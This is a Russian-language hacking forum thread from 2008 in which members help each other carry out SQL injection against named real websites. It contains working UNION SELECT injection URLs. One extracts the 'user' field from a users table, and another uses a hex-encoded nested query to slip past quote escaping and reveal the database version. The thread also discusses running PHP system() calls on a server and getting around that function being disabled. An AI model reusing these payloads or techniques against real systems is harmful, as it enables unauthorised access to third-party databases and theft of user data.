20.04.2008, 23:31
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
абалдеть.....как я так мимо пройти мог ппц:Р.Ничё бля не закодировано, а выдаёт какую-то левую ошибку.)(
|
|
|
20.04.2008, 23:48
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
С нами:
9800721
Репутация:
4
|
|
Велемир, только твой мат удерживает от того, чтобы добавить тебе репутацию.
|
|
|
|
21.04.2008, 07:56
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
просто я от ссылки Велемир-а отталкивался.
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=ru
сравни эти две ссылки поменял токо окончание с en на ru.
после /* опускаются как ты сказал, все в запросе mysql. но не как не все параметры GET. |
|
|
|
21.04.2008, 11:40
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Каким скриптом на php или perl можно воспользоваться, чтобы выяснить серверные пути.
Например /var/vadim/www/ и /var/orlusha/ чтобы выводился список каталогов.
|
|
|
|
21.04.2008, 16:29
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Гы)))) Ну без мата не могуЮ такая моя пошлая натура сложилась :Р(.Мя позабавило то, что там обрезается длина вывода ))).Субстринг решает  |
|
|
|
21.04.2008, 18:05
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
Сообщение от Ershik
Каким скриптом на php или perl можно воспользоваться, чтобы выяснить серверные пути.
Например /var/vadim/www/ и /var/orlusha/ чтобы выводился список каталогов.
аля пхп вроде так)
<?
system(pwd);
?>
ну или system(dir) если винда, вроде так)
Последний раз редактировалось Grema; 21.04.2008 в 18:12..
|
|
|
|
22.04.2008, 10:34
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Сообщение от Grema
аля пхп вроде так)
<?
system(pwd);
?>
ну или system(dir) если винда, вроде так)
Warning: system() has been disabled for security reasons in /usr/home/sait/pwd.php on line 2
Функция зпрещена. Можно это обойти?
|
|
|
|
21.04.2008, 19:20
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами:
9574565
Репутация:
712
|
|
Привет всем
Помогите пожалуйста разобраться,,, вот есть сайт:
www.fasie.ru/index.php?rid=120'
Немогу понять что нужно дальше делать 
Если я не ошибаюсь нужно вводить:
Код HTML:
www.fasie.ru/index.php?rid=-120+union+select+null,null,null*/
Но ошибки всё вылезают и вылезают:
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/classes.inc.php on line 63
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/content.inc.php on line 185
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/classes.inc.php on line 138
Пробовал делать так:
Код HTML:
www.fasie.ru/index.php?rid=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ((и тд.....))*/
Теже ошибки......нужно до бесконечности перебирать эти значения ???
Помогите пожалуйста |
|
|
|
21.04.2008, 20:01
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
там www.fasie.ru/index.php?rid=-120+union+select+1/*
только вывода я не нашёл .. сайт оч плохо грузится ..
|
|
|
|
22.04.2008, 06:07
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от 159932
там www.fasie.ru/index.php?rid=-120+union+select+1/*
только вывода я не нашёл .. сайт оч плохо грузится ..
вывод есть как я понял только если использовать двойной запрос, т.е. внутри этого запроса использовать еще один запрос, все неудобство в том, что кавычки экранируются, и приходится этот второй запрос переводить в hex вобщем вот:
Код:
http://www.fasie.ru/index.php?rid=120+union+select+0x2D3120756E696F6E2073656C65637420312C322C76657273696F6E28292C342C352C362C372C382C392C31302C31312C3132+limit+1,1/*
видим в заголовке страницы версию
фактически запрос выглядит так:
Код:
120 union select '-1 union select 1,2,version(),4,5,6,7,8,9,10,11,12' limit 1,1/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
